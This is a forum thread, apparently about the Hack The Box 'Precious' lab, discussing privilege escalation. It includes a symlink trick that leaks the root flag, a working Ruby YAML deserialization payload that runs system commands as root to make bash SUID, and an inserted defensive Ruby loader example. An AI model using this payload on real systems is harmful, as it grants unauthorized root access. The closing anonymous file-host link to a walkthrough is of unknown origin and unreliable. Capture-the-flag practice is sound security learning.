Precious - HTB [Discussion]
(November 26, 2022, 07:54 PM)loosie Wrote:
(November 26, 2022, 07:44 PM)11231123 Wrote: For root flag:

henry@precious:~$ ln -s /root/root.txt dependencies.yml
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
/opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)


Ok then?

The flag will be displayed there as an error string.
How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?
(November 26, 2022, 07:46 PM)annehathaway Wrote: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
Used payload2, worked like a charm, pretty straightforward box.

+1

Starting from the original payload, we can also modify it a bit to get a SUID bash, which is smarter for full access:

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod 4777 /bin/bash"
         method_id: :resolve



(November 27, 2022, 03:01 AM)AIAIIIIAK Wrote: How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?


Hint:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
(November 27, 2022, 03:07 AM)Himitsu Wrote: [the post above, quoted in full]

Thanks! forgot to check the sudo -l command.
(November 27, 2022, 03:07 AM)Himitsu Wrote: [the post above, quoted in full]

No need for git_set: "chmod 4777 /bin/bash".
git_set: "/bin/bash" is sufficient for root access.
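A defensive counterpart to the two root techniques discussed above (the symlinked dependencies.yml whose contents surface in the error message, and the !ruby/object payload), added here as an example that is not part of any post and is not the box's /opt/update_dependencies.rb. The names load_dependencies, verdict and demo are hypothetical, the "gem name => version" file format is an assumption, and the sample files are constructed.

```ruby
require "yaml"
require "tmpdir"

# Hypothetical hardened loader. Assumed format: mapping of gem name => version.
def load_dependencies(path)
  # O_NOFOLLOW makes open() fail with ELOOP when the last path component is a
  # symlink, so a link to another file is never read with elevated rights.
  text = File.open(path, File::RDONLY | File::NOFOLLOW, &:read)
  # safe_load builds only scalars, arrays and hashes; a !ruby/object tag raises
  # Psych::DisallowedClass instead of instantiating the named class.
  data = YAML.safe_load(text)
  ok = data.is_a?(Hash) && data.all? { |k, v| k.is_a?(String) && v.is_a?(String) }
  # The message deliberately omits the parsed value.
  raise TypeError, "expected a name => version mapping" unless ok
  data
end

# Maps each failure mode to a symbol without echoing file contents, so nothing
# read as root leaks through an error message.
def verdict(path)
  load_dependencies(path)
  :ok
rescue Errno::ELOOP
  :symlink_refused
rescue Psych::DisallowedClass
  :object_tag_refused
rescue TypeError, Psych::SyntaxError
  :bad_structure
end

# Constructed sample inputs, written to a throwaway directory.
def demo
  Dir.mktmpdir do |dir|
    good = File.join(dir, "good.yml")
    File.write(good, "examplegem: \"1.0.0\"\n")
    tagged = File.join(dir, "tagged.yml")
    File.write(tagged, "--- !ruby/object:Gem::Requirement\nrequirements: []\n")
    scalar = File.join(dir, "scalar.yml")
    File.write(scalar, "just one line of text\n")
    link = File.join(dir, "link.yml")
    File.symlink(good, link)
    [good, tagged, scalar, link].map { |p| verdict(p) }
  end
end

p demo if __FILE__ == $PROGRAM_NAME
```

The commands in the thread are run from henry's home directory, which implies the script resolves dependencies.yml relative to the current directory. Reading it from an absolute path in a root-owned directory removes that control from the unprivileged user.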
What PDF do I use, please?
Step by Step Walkthrough
https://anonfiles.com/K9c0O5J8yf/precious_walkthrough_pdf